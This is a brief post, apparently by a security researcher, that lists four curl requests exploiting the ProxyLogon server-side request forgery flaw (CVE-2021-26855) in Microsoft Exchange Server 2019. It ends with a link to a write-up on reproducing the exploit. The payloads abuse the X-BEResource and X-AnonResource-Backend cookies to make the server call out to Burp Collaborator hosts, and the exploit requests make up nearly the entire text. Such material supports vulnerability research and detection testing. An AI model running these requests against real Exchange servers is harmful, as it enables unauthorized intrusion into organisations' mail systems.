My early SSRF payloads (CVE-2021-26855) over Exchange Server 2019...
Payload (1)
# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-AnonResource=true; X-AnonResource-Backend=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/owa/auth/logon.aspx?~3' $'https://<exchange_server>/owa/auth/Current/themes/resources/logon.css'
Payload (2)
# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/api/endpoint#~1' $'https://<exchange_server>/ecp/favicon.ico'
Payload (3)
# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Length: 0' -b $'X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net#~1' $'https://<exchange_server>/ecp/favicon.ico'
Payload (4)
# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-AnonResource=true; X-AnonResource-Backend=sgca4i4yj8wrpuipvxeupawsqjw9ky.burpcollaborator.net/#~1' $'https://<exchange_server>/owa/auth/favicon.ico'
[../snip]
https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
Alex Hernandez aka (@_alt3kx_)